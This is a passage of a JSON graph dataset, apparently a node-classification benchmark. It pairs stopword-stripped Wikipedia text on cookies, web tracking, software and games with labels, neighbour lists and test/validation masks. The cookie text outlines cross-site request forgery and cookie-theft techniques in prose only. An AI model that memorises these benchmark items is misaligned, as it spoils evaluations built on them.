scripting languages like javascript therefore attacker able gather cookies older versions many browsers security holes implementation xmlhttprequest api api allows pages specify proxy server would get reply proxy server subject same-origin policy example victim reading attacker posting codice_85 attacker script executed victim browser script generates request codice_85 proxy server codice_90 since request codice_85 codice_17 cookies sent along request routed attacker proxy server hence attacker would able harvest victim cookies attack would work secure cookies since transmitted https connections https protocol dictates end-to-end encryption i.e information encrypted user browser decrypted destination server case proxy server would see raw encrypted bytes http request example bob might browsing chat forum another user mallory posted message suppose mallory crafted html image element references action bob bank website rather image file e.g. bob bank keeps authentication information cookie cookie n't expired attempt bob browser load image submit withdrawal form cookie thus authorizing transaction without bob approval cookiejacking form hacking wherein attacker gain access session cookies internet explorer user discovered rosario valotta internet security researcher exploit allows attacker obtain cookie site thus username password tricking user dragging object across screen although microsoft deemed flaw low-risk level required user interaction necessity user already logged website whose cookie stolen valotta able use social engineering attack obtain three days cookies 80 facebook users 150 friends besides privacy concerns cookies also technical drawbacks particular always accurately identify users used security attacks often odds representational state transfer rest software architectural style one browser used computer usually separate storage area cookies hence cookies identify person combination user account computer web browser thus anyone uses multiple accounts computers browsers multiple sets cookies likewise cookies differentiate multiple users share user account computer browser use cookies may generate inconsistency state client state stored cookie user acquires cookie clicks back button browser state browser generally acquisition example shopping cart online shop built using cookies content cart may change user goes back browser history user presses button add item shopping cart clicks back button item remains shopping cart might intention user possibly wanted undo addition item lead unreliability confusion bugs web developers therefore aware issue implement measures handle situations operations done using cookies also done using mechanisms json web token jwt self-contained packet information used store user identity authenticity information allows used place session cookies unlike cookies automatically attached http request browser jwts must explicitly attached http request web application http protocol includes basic access authentication digest access authentication protocols allow access web page user provided correct username password server requires credentials granting access web page browser requests user obtained browser stores sends every subsequent page request information used track user users may tracked based ip address computer requesting page server knows ip address computer running browser proxy used could theoretically link user session ip address however ip addresses generally reliable way track session identify user many computers designed used single user office pcs home pcs behind network address translator nat means several pcs share public ip address furthermore systems tor designed retain internet anonymity rendering tracking ip address impractical impossible security risk precise technique based embedding information urls query string part url part typically used purpose parts used well java servlet php session mechanisms use method cookies enabled method consists web server appending query strings containing unique session identifier links inside web page user follows link browser sends query string server allowing server identify user maintain state kinds query strings similar cookies contain arbitrary pieces information chosen server sent back server every request however differences since query string part url url later reused attached piece information sent server could lead confusion example preferences user encoded query string url user sends url another user e-mail preferences used user well moreover user accesses page multiple times different sources guarantee query string used time example user visits page coming page internal site first time visits page coming external search engine second time query strings would likely different cookies used situation cookies would drawbacks query strings related security storing data identifies session query string enables session fixation attacks referer logging attacks security exploits transferring session identifiers http cookies secure another form session tracking use web forms hidden fields technique similar using url query strings hold information many advantages drawbacks fact form handled http get method technique similar using url query strings since get method adds form fields url query string forms handled http post causes form information including hidden fields sent http request body neither part url cookie approach presents two advantages point view tracker first tracking information placed http request body rather url means noticed average user second session information copied user copies url bookmark page send via email example current web browsers store fairly large amount data 2–32 mb via javascript using dom property codice_97 data used instead session cookies also cross-domain technique coupled json/javascript objects store complex sets session variables client side downside every separate window tab initially empty codice_97 property opened furthermore property used tracking visitors across different websites making concern internet privacy respects secure cookies due fact contents automatically sent server every request like cookies vulnerable network cookie sniffing attacks however special measures taken protect data vulnerable attacks data available across different websites opened window tab apple uses tracking technique called identifier advertisers idfa technique assigns unique identifier every user buys apple ios device iphone ipad identifier used apple advertising network iad determine ads individuals viewing responding etags cached browser returned subsequent requests resource tracking server simply repeat etag received browser ensure assigned etag persists indefinitely similar way persistent cookies additional caching headers also enhance preservation etag data etags flushed browsers clearing browser cache web browsers support persistence mechanisms allow page store information locally later use html5 standard modern web browsers support extent includes javascript api called web storage allows two types storage local storage session storage local storage behaves similarly persistent cookies session storage behaves similarly session cookies except session storage tied individual tab/window lifetime aka page session whole browser session like session cookies internet explorer supports persistent information browser history browser favorites xml store user data directly within web page saved disk web browser plugins include persistence mechanisms well example adobe flash local shared object microsoft silverlight isolated storage browser cache also used store information used track individual users technique takes advantage fact web browser use resources stored within cache instead downloading website determines cache already up-to-date version resource example website could serve javascript file code sets unique identifier user example codice_99 user initial visit every time user accesses page file loaded cache instead downloaded server thus content never change browser fingerprint information collected browser configuration version number screen resolution operating system purpose identification fingerprints used fully partially identify individual users devices even cookies turned basic web browser configuration information long collected web analytics services effort accurately measure real human web traffic discount various forms click fraud assistance client-side scripting languages collection much esoteric parameters possible assimilation information single string comprises device fingerprint 2010 eff measured least 18.1 bits entropy possible browser fingerprinting canvas fingerprinting recent technique claims add another 5.7 bits",
    "neighbors": [
      513,
      6657,
      517,
      9736,
      9233,
      9746,
      2579,
      6171,
      9757,
      5150,
      8735,
      7713,
      10791,
      9770,
      559,
      2099,
      4661,
      3639,
      10808,
      11319,
      2106,
      3643,
      9275,
      64,
      5707,
      11345,
      10834,
      87,
      6231,
      8281,
      6747,
      5724,
      607,
      4198,
      3688,
      1642,
      9834,
      9841,
      115,
      3187,
      4213,
      4725,
      119,
      4728,
      9843,
      10872,
      3707,
      4732,
      637,
      8316,
      1664,
      2182,
      10392,
      7324,
      10910,
      8351,
      3744,
      7340,
      175,
      2737,
      9394,
      9395,
      9908,
      185,
      11449,
      4797,
      1223,
      11466,
      7885,
      11469,
      7887,
      9424,
      10450,
      7893,
      4310,
      9941,
      2777,
      8923,
      737,
      10466,
      4326,
      2796,
      1774,
      8443,
      4863,
      2818,
      9987,
      7943,
      278,
      4893,
      807,
      1319,
      11559,
      1834,
      5934,
      7982,
      5435,
      3912,
      10057,
      6474,
      11082,
      2893,
      3920,
      10579,
      4956,
      7012,
      3434,
      8557,
      5492,
      8054,
      6528,
      3971,
      3462,
      8584,
      3473,
      11154,
      5524,
      7572,
      5026,
      2470,
      5543,
      8623,
      944,
      6576,
      2996,
      3517,
      5054,
      449,
      450,
      8644,
      6086,
      8648,
      4048,
      5078,
      8664,
      9181,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      1009,
      7152,
      9712,
      11250,
      6133,
      4086,
      5622,
      7669,
      5114,
      8699,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 7966,
    "label": 3,
    "text": "Space_Shuttle:_A_Journey_into_Space:space shuttle journey space space shuttle journey space space flight simulator game designed steve kitchen atari 2600 published activision 1983 one first realistic spacecraft simulations available home systems space shuttle adapted atari 8-bit family atari 5200 bob henderson 1984 ported zx spectrum 1984 commodore 64 1984 amstrad cpc 1986 msx 1986 1984 activision software catalog also mentions apple ii version player controls critical flight phases launch stabilizing orbit docking deorbit burn reentry landing set instructions follow original atari 2600 version came overlay since made use switches april 1984 review video games magazine dan persons wrote space shuttle game everybody requires considerable amount patience perhaps surprisingly considerable amount brainpower players seek visceral thrills standard shoot'em-up may ultimately find simulation complexity frustrating ready richer sophisticated experience probably recognize space shuttle monumental achievement",
    "neighbors": [
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 7967,
    "label": 8,
    "text": "Sawmill_(software):sawmill software sawmill software package statistical analysis reporting log files dynamic contextual filtering 'live data zooming user interface customization custom calculated reports sawmill also incorporates real-time reporting real-time alerting available since 1997 time sawmill provides support approximately 850 server log file formats new formats added request sawmill also includes page tagging server javascript page tag analysis client side clicks client requests providing total view visitor traffic on-site behavioural activity sawmill analytics offered three forms software package user deployment turnkey on-premises system appliance saas sawmill analyzes device software package producing log file includes web servers firewalls proxy servers mail servers network devices switches routers etc syslog servers databases etc sawmill oem reporting engine sold blue coat systems bundled part proxy server product branded version also sold cisco systems sawmill ironport branded version also sold vicomsoft ltd intergate intelligence branded version also sold sonicwall sonicwall aventail advanced reporting sawmill second runner-up 2009 streaming media european readers choice awards sawmill listed ideal observer web analytics tool overview",
    "neighbors": [
      3520,
      225,
      4033,
      6273,
      8998,
      5612,
      8941,
      7983,
      6576,
      6834,
      467,
      2901,
      4725,
      1943,
      8821,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 7968,
    "label": 1,
    "text": "Database_forensics:database forensics database forensics branch digital forensic science relating forensic study databases related metadata discipline similar computer forensics following normal forensic process applying investigative techniques database contents metadata cached information may also exist servers ram requiring live analysis techniques forensic examination database may relate timestamps apply update time row relational table inspected tested validity order verify actions database user alternatively forensic examination may focus identifying transactions within database system application indicate evidence wrongdoing fraud software tools used manipulate analyse data tools also provide audit logging capabilities provide documented proof tasks analysis forensic examiner performed database currently many database software tools general reliable precise enough used forensic work demonstrated first paper published database forensics currently single book published field though destined additionally subsequent sql server forensics book kevvie fowler named sql server forensics well regarded also forensic study relational databases requires knowledge standard used encode data computer disk documentation standards used encode information well-known brands db sql server oracle contributed public domain others include apex analytix forensic analysis database executed isolation technological framework within subject database exists crucial understanding resolving questions data authenticity integrity especially relates database users",
    "neighbors": [
      2688,
      2437,
      7560,
      9481,
      10505,
      5010,
      10258,
      4500,
      8469,
      10518,
      4376,
      9112,
      3099,
      6177,
      290,
      1314,
      5284,
      7461,
      8742,
      5550,
      11182,
      5808,
      10290,
      10418,
      4789,
      9527,
      3768,
      8635,
      3004,
      9661,
      2494,
      830,
      4416,
      2369,
      5441,
      9663,
      11457,
      8518,
      72,
      7369,
      6475,
      10189,
      4049,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      4834,
      5475,
      11362,
      7525,
      9319,
      8808,
      10471,
      6383,
      9079,
      7160,
      2681,
      11642,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 7969,
    "label": 6,
    "text": "Block_availability_map:block availability map computer file systems block availability map bam data structure used track disk blocks considered free available new data used along directory manage files disk originally floppy disk later also hard disk terms commodore dos cbm dos compatible disk drives bam data structure stored reserved area disk size location varied based physical characteristics disk track bam consisted bitmap available blocks usually count available blocks count held single byte formats 256 fewer blocks per track count byte simply sum 1-bits bitmap bytes current track following table illustrates layout commodore 1541 bam table would larger higher-capacity disks described bitmap contained 3 bytes commodore 1541 format single-sided disks 17 20 sectors per track note 3 bytes hold least 20 bits similarly commodore 1571 used 3 bytes bitmap track bam twice size twice many tracks formatted double-sided contrast commodore 1581 disk drive used 5 bytes bitmap disk format 40 blocks per track note 5 bytes hold 40 bits bitmap format 1 bit indicated block available free 0 bit indicated block available used bitmap data stored low-byte first first byte held map blocks 0 7 second byte held map blocks 8 15 within byte bitmap ordered low-bit first example first byte would represent block 0 least significant bit block 7 significant bit storage devices creative micro designs intended use cbm computers also used block availability map served purpose however devices fd-2000 fd-4000 cmd-hd include count byte bits byte reversed high-bit first although bits reversed compared cbm formats bytes still stored order low-byte first",
    "neighbors": [
      9762,
      3315,
      2933,
      3257,
      6843,
      4764
    ],
    "mask": "Test"
  },
  {
    "node_id": 7970,
    "label": 2,
    "text": "Bundling_of_Microsoft_Windows:bundling microsoft windows bundling microsoft windows installation microsoft windows computers purchase microsoft encourages original equipment manufacturers oems personal computers include windows licenses products agreements microsoft oems undergone antitrust scrutiny users opposed bundling microsoft windows sought refunds windows licenses arguing windows end-user license agreement entitles return unused windows licenses cash refund although customers successfully obtained payments cases litigation lengthy negotiations others less successful microsoft encourages original equipment manufacturers oems supply computers windows pre-installed saying consumers benefit install operating system analyst vishal tripathi said many consumers purchase pcs pre-installed operating systems want deal learning curve inconvenience installing operating system virtually large computer vendors bundle microsoft windows majority personal computers ranges 1999 maximum pc wrote non-windows users long griped machines large companies ca n't purchased without windows 1999 analyst rob enderle attributed lack computers without windows available individual purchase economic impracticality citing certification warranty requirements 1999 dell stated offered non-microsoft operating systems servers part customized large orders linux became popular enough make linux pre-installation cost-effective 'd foolish offer guardian computer editor jack schofield said significant overhead costs associated pre-installation linux part due linux small market share serdar yegulalp computerworld said late 1990s linux fully developed linux computers tough sell non-technical users microsoft historically engaged licensing practices discouraged installation non-microsoft operating systems microsoft assessed license fees based number computers oem sold regardless whether windows license included beginning 1983 microsoft sold ms-dos licenses oems individually-negotiated basis contracts required oems purchase number ms-dos licenses equal greater number computers sold result zero marginal cost oems include ms-dos installing operating system ms-dos would effectively require double payment operating system royalties also microsoft penalized oems installed alternative operating systems making license terms less favorable microsoft entered consent decree 1994 barred microsoft conditioning availability windows licenses varying prices based whether oems distributed operating systems microsoft general counsel brad smith said decree effective allowing dell hp offer linux computers jeremy reimer ars technica stated decree made fiscally realistic sell computers alternative operating systems 1999 microsoft representative stated contracts oems stop oem shipping operating system pcs 2010 microsoft stated agreements oems distribute windows nonexclusive oems free distribute computers different operating system without operating system 2001 article byte reported license agreements oems microsoft forbade oems including windows alongside another operating system computer according 1999 new york times article critics assert company continues use market clout ensure nearly new personal computers come windows pre-installed 2009 microsoft stated always charged oems 50 windows license 1,000 computer 2007 dell stated computers ubuntu installed would priced 50 lower comparable systems windows installed 2010 zdnet article chris clay wrote dell computers ubuntu preinstalled priced higher identical systems windows preinstalled even though ubuntu free open source claimed increase price computer resulting inclusion windows license called windows tax microsoft tax opposing computer users computer purchasers request refunds windows licenses included purchased computers want use windows preferring operating system linux instead jeff walsh infoworld said businesses site licenses save money requesting refunds windows licenses included purchased computers users avoid windows tax altogether assembling computer individually purchased parts purchasing computer oem bundle windows smaller oems larger retail chains system76 taken specializing linux-based systems advantage major suppliers paucity non-windows offerings beginning 2007 dell offered computers ubuntu pre-installed 2014 hewlett-packard stated sells units bundled built-in os without linux distributors also run 'partnership programs endorse suppliers machines system pre-installed vendors purchase computers major oems install linux resell chris clay zdnet wrote employee discount programs create financial incentive purchase computers large manufacturer even manufacturer offer computers without windows microsoft requires oems support uefi secure boot products qualify windows 8 logo program concerns raised oems might ship systems allow users disable secure boot install signing keys alternative operating systems computers would unable boot non-windows operating system unless operating system signed keys included computer complicating issue windows refunds microsoft claims oems would free decide keys include manage competing os vendors relative lack influence desktop os market compared microsoft might mean even signed versions operating systems available might face difficulties getting hardware vendors include keys especially end users wo n't able manage keys boot locking required arm devices microsoft provide refunds windows licenses sold oem including licenses come purchase computer pre-installed computer microsoft denmark representative stated microsoft windows license terms allow oems offer refund windows license microsoft end user license agreement windows 10 states 1999 relevant text read 1999 according infoworld users taking eula literally plan demand cash refund 1999 microsoft representative described requesting windows refund basis rejecting license technicality someone twisting language little bit come idea run back oem laurie j. flynn new york times characterized license refund argument using loophole license agreement oem policies refunding unused windows licenses vary oems programs specifically allow user receive refund unused windows license acer us windows refund program user ship computer unused copy windows acer service center computer returned without windows refund acer policy requires customer return items expense balance received customer low €30 applies eu reported refund 2014 €40 windows 8 vendors like dell ad hoc procedures users request refund windows license one user received £55.23 refund dell said process pretty gob-smacked easy cases vendors asked customers requesting refunds sign non-disclosure agreements 1999 toshiba representative stated case user obtained 110 refund typical policy people run try vendors issue refunds windows licenses february 1999 infoworld reported pc manufacturers currently offering refunds users use windows according 1999 maximum pc article dell provide refunds windows licenses interpreting license agreement treat hardware software single package must returned 2009 sony refused offer partial refund customer declined windows vista eula instead offering refund entire computer consumer declined litigation users denied partial refund unused windows license resulted rulings france italy bundling microsoft windows refusing offer partial refunds windows license violates applicable law september 2014 supreme court italy ruling 19161/2014 decided laptop buyer entitled receive refund €140 price microsoft windows license microsoft works license computer saying bundling commercial policy forced distribution slammed practice monopolistic tendency india bundling challenged users violation competition act 2002 one sent legal notice hp however another license refund case french appellate court ruled favor oem holding sale issue constitute unfair commercial practice coercive selling permitted circumstances unfair commercial tying practice misleading aggressive commercial practice case pending court cassation september 2016 court justice european union ruled sale computer equipped pre-installed software constitute unfair commercial practice within meaning directive 2005/29 offer contrary requirements professional diligence distort economic behaviour consumers court also ruled directive 2005/29 require oems include separate price operating system license websites created specific purpose spreading information issue educating others options getting refund 1999 rally opposing bundling windows attracted 100 protesters gained media attention worldwide overall goal events get oems expand selection computers without copy windows pre-installed additional goal getting revise improve refund policies first goal met analyst stated refund actions individual users publicity stunt impact",
    "neighbors": [
      259,
      4356,
      11524,
      6150,
      5384,
      6797,
      782,
      1935,
      2196,
      3605,
      10900,
      11030,
      3224,
      8092,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      11559,
      1832,
      6441,
      6827,
      7215,
      3890,
      11060,
      8757,
      823,
      7359,
      4289,
      194,
      3527,
      9033,
      6476,
      10957,
      4816,
      4051,
      9812,
      11221,
      11605,
      4439,
      11103,
      4704,
      10338,
      740,
      2919,
      9448,
      617,
      8681,
      9585,
      7796,
      1400,
      6265,
      1916
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7971,
    "label": 9,
    "text": "Java_Data_Mining:java data mining java data mining jdm standard java api developing data mining applications tools jdm defines object model java api data mining objects processes jdm enables applications integrate data mining technology developing predictive analytics applications tools jdm 1.0 standard developed java community process jsr 73 2006 jdm 2.0 specification developed jsr 247 withdrawn 2011 without standardization various data mining functions techniques like statistical classification association regression analysis data clustering attribute importance covered 1.0 release standard never received wide acceptance known implementation",
    "neighbors": [
      4960,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 7972,
    "label": 5,
    "text": "WAN_optimization:wan optimization wan optimization collection techniques increasing data transfer efficiencies across wide-area networks wans 2008 wan optimization market estimated 1 billion grow 4.4 billion 2014 according gartner technology research firm 2015 gartner estimated wan optimization market 1.1 billion market common measures tcp data-transfer efficiencies i.e. optimization throughput bandwidth requirements latency protocol optimization congestion manifested dropped packets addition wan classified regards distance endpoints amounts data transferred two common business wan topologies branch headquarters data center data center dc2dc general branch wan links closer use less bandwidth support simultaneous connections support smaller connections short-lived connections handle greater variety protocols used business applications email content management systems database application web delivery comparison dc2dc wan links tend require bandwidth distant involve fewer connections connections bigger 100 mbit/s 1 gbit/s flows longer duration traffic dc2dc wan may include replication back data migration virtualization business continuity/disaster recovery bc/dr flows wan optimization subject extensive academic research almost since advent wan early 2000s research private public sectors turned improving end-to-end throughput tcp target first proprietary wan optimization solutions branch wan recent years however rapid growth digital data concomitant needs store protect presented need dc2dc wan optimization example optimizations performed increase overall network capacity utilization meet inter-datacenter transfer deadlines minimize average completion times data transfers another example private inter-datacenter wans benefit optimizations fast efficient geo-replication data content newly computed machine learning models multimedia content component techniques branch wan optimization include deduplication wide area file services wafs smb proxy https proxy media multicasting web caching bandwidth management requirements dc2dc wan optimization also center around deduplication tcp acceleration however must occur context multi-gigabit data transfer rates",
    "neighbors": [
      2985,
      651,
      8022,
      8792,
      1049,
      8666
    ],
    "mask": "Test"
  },
  {
    "node_id": 7973,
    "label": 2,
    "text": "Malgun_Gothic:malgun gothic malgun gothic 맑은 고딕 korean sans-serif typeface developed sandoll communications hinting monotype imaging replacement dotum gulim default system font korean language version windows vista first shipped windows vista available download later windows server 2008 windows xp users name malgun means clear korean thus making direct translation font name clear gothic font uses segoe ui latin text korean glyphs created based typeface hunminjeongeum streamlined modern form characters well upright well-regulated strokes font supports ks x 1001 character set unlike dotum gulim han ideographic glyphs windows pull gulim hanja set instead initially fonts n't include half-width fixed latin glyphs hanja designed malgun gothic chinatype design monotype imaging inc. released windows 8 released glyphs n't rounded terminals windows vista includes two roman weights font windows 10 malgun gothic changed number characteristics shown significantly 2 1",
    "neighbors": [
      2593,
      4130,
      9539,
      8422,
      1098,
      4138,
      4141,
      6797,
      1487,
      3538,
      4146,
      4148,
      8374,
      9654,
      4127
    ],
    "mask": "None"
  },
  {
    "node_id": 7974,
    "label": 1,
    "text": "GEPIR:gepir gepir publicly available cost limits number requests per/day ip 30 gs1 offers similar paid service gs1 data hub provides additional capabilities without traffic limitations imposed gepir search 111 gs1 member organizations gepir since 2013 first digits gtin code called gs1 prefix used route query corresponding gs1 member organization results returned html xml countries soap webservice provides return code indicating error occurred gepir accessible free almost countries number request per day limited 20 30 since october 2013 gs1 france restricts access gepir companies registration siren number required use premium access created gs1 france january 2010 allows companies use gs1 web soap interface without limit price access public gepir lookup service coordinated gs1 go provides end users ability look information gs1 identification keys depending service systems provided gs1 member organisations mos 3rd party service providers gs1 mo choose provide service directly end users gs1 global office may provide service geography services involve technical component deployed gs1 global office coordinates systems provided gs1 mos and/or 3rd party service providers gepir service provided systems deployed gs1 mos gs1 go providing central point coordination federate local systems gs1 go also provides mo-level service mos wish deploy system nature synchronization gepir requires users know quality issues exceptions conformance program introduced gs1 2013",
    "neighbors": [
      2901,
      10486,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7975,
    "label": 6,
    "text": "Everything_is_a_file:everything file everything file describes one defining features unix derivatives—that wide range input/output resources documents directories hard-drives modems keyboards printers even inter-process network communications simple streams bytes exposed filesystem name space advantage approach set tools utilities apis used wide range resources number file types file opened file descriptor created file path becoming addressing system file descriptor byte stream i/o interface file descriptors also created things like anonymous pipes network sockets via different methods therefore accurate description feature everything file descriptor additionally range pseudo virtual filesystems exists exposes information processes system information hierarchical file-like structure mounted single file hierarchy example purely virtual filesystem /proc exposes many system properties files files broader sense word standard unix file attributes owner access permissions queried classic unix tools filters however universally considered fast portable approach operating systems even mount /proc default due security speed concerns though used heavily widely installed busybox embedded systems procps used linux systems cases used implementations process-related posix shell commands similarly used android systems operating system toolbox program unix successor plan 9 took concept distributed computing 9p protocol",
    "neighbors": [
      9762,
      9507,
      516,
      5452,
      4589,
      2479,
      11568,
      3571,
      5363,
      5492,
      8499,
      823,
      11675,
      2395,
      6812,
      6813
    ],
    "mask": "Test"
  },
  {
    "node_id": 7976,
    "label": 3,
    "text": "Way_of_the_Tiger:way tiger way tiger series adventure gamebooks mark smith jamie thomson set fantasy world orb reader takes part young monk/ninja avenger initially quest avenge foster father recover stolen scrolls later books presented challenges avenger overcome notably taking ruling city world orb originally created mark smith dungeons dragons game ran pupil brighton college mid-1970s orb also used setting fighting fantasy gamebook talisman death smith thomson book disclaimer front performing ninja related feats book could lead serious injury death untrained user sixth book inferno ends cliffhanger avenger trapped web black widow orb darkest blight new books released fate avenger orb unknown mark smith confirmed cliffhanger ending deliberate august 2013 original creators series working megara entertainment develop re-edited hardcover collector editions gamebooks including new prequel book 0 sequel book 7 potentially role-playing game based series two new books plus six re-edited original books reprinted paperback format megara entertainment 2014 made available pdfs 2019 december 2013 announced tin man games would releasing original six books series digital platforms 2014 2015 however 2017 nothing released original series comprises six books books could played sequence standalone adventures although playing sequence preserves continuity storyline played sequence abilities bonuses penalties special items avenger acquired carried next book expanded eight-book series consists following titles first last printed many years original six series featured combat system based unarmed fighting moves colourful names cobra strike punch leaping tiger kick avenger could also choose list ninja skills acrobatics poison needle spitting used variety appropriate weaponry garotte shuriken luck also played part form fate tests see fate smiled turned back avenger could also enhance skill using inner force similar qi energy series avenger could learn new skills shinren means understanding people intentions observing subtle clues books large number opponents recurring characters aside certain ancient titans called elder gods orb ruled various deities two video games based books released first way tiger beat 'em released gremlin graphics amstrad cpc zx spectrum commodore 16 commodore 64 game avenger fighting staves swords well utilizing unarmed combat avenger rarely used weapons apart shuriken books way tiger ii avenger action-adventure made gremlin graphics 1986 computers commodore 64 amstrad cpc zx spectrum msx game story yaemon grand master flame killed player foster-father naijish stolen scrolls kettsuin recover scrolls player find enough keys penetrate quench heart keep kill three guards game viewed top-down perspective superficially resembles gauntlet",
    "neighbors": [
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 7977,
    "label": 9,
    "text": "Mobile_BASIC:mobile basic mobile basic proprietary dialect basic programming language used program java-enabled mobile phones possible interpreter midlet",
    "neighbors": [
      9714,
      8262
    ],
    "mask": "None"
  },
  {
    "node_id": 7978,
    "label": 9,
    "text": "Standard_Portable_Intermediate_Representation:standard portable intermediate representation standard portable intermediate representation spir intermediate language parallel compute graphics khronos group originally developed use opencl spir rewritten spir-v march 2015 opencl uses just-in-time compilation jit necessitating one two software distribution patterns developers distribute device-specific pre-compiled binaries distribute relevant source code limited desire protect intellectual property spir enables creation distribution device-independent binaries within opencl stack spir originally introduced 2011 spir-v introduced 2015 spir prior 2015 spir-v release based llvm intermediate representation provisional specification spir 1.0 announced 2012 july 22 2013 provisional specification spir 1.2 announced siggraph 2013 final spir 1.2 specification released hipeac 2014 january 21 2014 august 11th 2014 provisional specification spir 2.0 released siggraph 2014 spir-v 1.0 rewritten version spir announced march 2015 released nov. 16 2015 spir family includes true cross-api standard fully defined khronos native support shader kernel features spir-v high-level intermediate language exchanged binary form functions represented control flow graph basic blocks using static single assignment ssa form data structures retain high-level hierarchical representation lossy like previous byte-code virtual machine-like intermediate representations used graphical shaders allows higher performance lowering target devices support ingestion spir-v incorporated core specification opencl 2.1 vulkan api opengl version 4.6 april 18th 2016 spir-v 1.1 released iwocl 2016 along provisional opencl 2.2 spir-v 1.1 added support opencl c++ initializer/finalizer function execution modes named barriers subgroup execution program scope pipes pipe storage may 16 2017 spir-v 1.2 released iwocl 2017 along opencl 2.2 spir-v 1.2 added support runtime specialization key tuning parameters opencl 2.2 march 7 2018 spir-v 1.3 released along vulkan 1.1 spir-v 1.3 added support subgroup operations enables enhanced compiler optimizations may 7 2019 spir-v 1.4 released",
    "neighbors": [
      8609,
      8514,
      9604,
      5612,
      4332,
      3854,
      7983,
      10703,
      6705,
      8438,
      7645
    ],
    "mask": "None"
  },
  {
    "node_id": 7979,
    "label": 4,
    "text": "Information_assurance:information assurance information assurance ia practice assuring information managing risks related use processing storage transmission information data systems processes used purposes information assurance includes protection integrity availability authenticity non-repudiation confidentiality user data uses physical technical administrative controls accomplish tasks focused predominantly information digital form full range ia encompasses digital also analog physical form protections apply data transit physical electronic forms well data rest various types physical electronic storage facilities ia best thought superset information security i.e umbrella term business outcome information risk management information assurance ia process getting right information right people right time ia benefits business use information risk management trust management resilience appropriate architecture system safety security increases utility information authorized users reduces utility information unauthorized strongly related field information security also business continuity ia relates business level strategic risk management information related systems rather creation application security controls therefore addition defending malicious hackers code e.g. viruses ia practitioners consider corporate governance issues privacy regulatory standards compliance auditing business continuity disaster recovery relate information systems information security draws primarily computer science ia interdisciplinary field requiring expertise business accounting user experience fraud examination forensic science management science systems engineering security engineering criminology addition computer science information assurance also term used governments including government united kingdom provision holistic security information systems use term interdisciplinary approach set somewhat lessened security/ systems engineering business continuity/ enterprise resilience forensic investigation threat analysis considered management science accounting criminology considered developing mitigation risks developed risk assessments conducted hmg information assurance standard 1 2 replaced hmg information security standard 2 sets principles requirements risk management accordance principles one information assurance standards currently used within uk public sector information assurance process typically begins enumeration classification information assets protected next ia practitioner perform risk assessment assets vulnerabilities information assets determined order enumerate threats capable exploiting assets assessment considers probability impact threat exploiting vulnerability asset impact usually measured terms cost asset stakeholders sum products threats impact probability occurring total risk information asset risk assessment complete ia practitioner develops risk management plan plan proposes countermeasures involve mitigating eliminating accepting transferring risks considers prevention detection response threats framework published standards organization nist rmf risk cobit pci dss iso/iec 27002 may guide development countermeasures may include technical tools firewalls anti-virus software policies procedures requiring controls regular backups configuration hardening employee training security awareness organizing personnel dedicated computer emergency response team cert computer security incident response team csirt cost benefit countermeasure carefully considered thus ia practitioner seek eliminate risks possible manage cost-effective way risk management plan implemented tested evaluated often means formal audits ia process iterative one risk assessment risk management plan meant periodically revised improved based data gathered completeness effectiveness number international national bodies issue standards information assurance practices policies procedures uk include information assurance advisory council information assurance collaboration group information assurance also evolved due social media",
    "neighbors": [
      5636,
      1415,
      4873,
      2190,
      5646,
      5780,
      1941,
      10232,
      7075,
      11172,
      2213,
      8998,
      8744,
      943,
      2607,
      5423,
      8881,
      10034,
      10290,
      6593,
      10821,
      4678,
      11594,
      6604,
      10190,
      7887,
      8656,
      11470,
      4948,
      6360,
      1369,
      11609,
      4956,
      10845,
      3552,
      9184,
      1762,
      612,
      496,
      6514,
      4595,
      3447,
      6648,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 7980,
    "label": 2,
    "text": "SchoolTool:schooltool schooltool gpl licensed free student information system schools around world goals project create simple turnkey student information system including demographics gradebook attendance calendaring reporting primary secondary schools well framework building customized applications configurations individual schools states schooltool built free software/open source software stack licensed gnu general public license version 2 written python using zope 3 framework sub-projects school tool follows schooltool configured default act often called student information system sis focus tracking information related students demographics enrollment grades attendance reporting subset complete “ management information system ” mis schools might also cover systems like accounting schooltool learning management system lms moodle although share overlapping feature sets gradebook schooltool contain curriculum learning objects post product news page october 2016 titled future sielibre schooltool indicates primary schooltool developers moved things accompanied google document explaining decision thanking contributors efforts",
    "neighbors": [
      3969,
      6941,
      546,
      7983,
      2864,
      10683,
      1101,
      8909,
      10701,
      595,
      8147,
      10971,
      10851,
      9320,
      11625,
      8554,
      1777,
      8177,
      8691,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 7981,
    "label": 9,
    "text": "JScheme:jscheme jscheme implementation scheme programming language created kenneth r. anderson timothy j. hickey peter norvig almost compliant r4rs scheme standard interface java distributed licence zlib/libpng jscheme free software",
    "neighbors": [
      4992,
      10752,
      11269,
      3334,
      6919,
      7562,
      2062,
      9231,
      1301,
      9749,
      9877,
      8728,
      4633,
      6556,
      3869,
      10012,
      2335,
      6047,
      8226,
      4516,
      5031,
      9128,
      5803,
      5677,
      7983,
      2225,
      10547,
      11255,
      311,
      2105,
      7867,
      6717,
      4799,
      5569,
      6594,
      8771,
      4550,
      8262,
      7880,
      8908,
      1613,
      205,
      11218,
      9299,
      10712,
      3034,
      3675,
      10463,
      7392,
      7904,
      11488,
      7267,
      10083,
      8293,
      6502,
      2666,
      3051,
      5612,
      5360,
      5361,
      8435,
      3446,
      5751,
      6906,
      7805
    ],
    "mask": "None"
  },
  {
    "node_id": 7982,
    "label": 8,
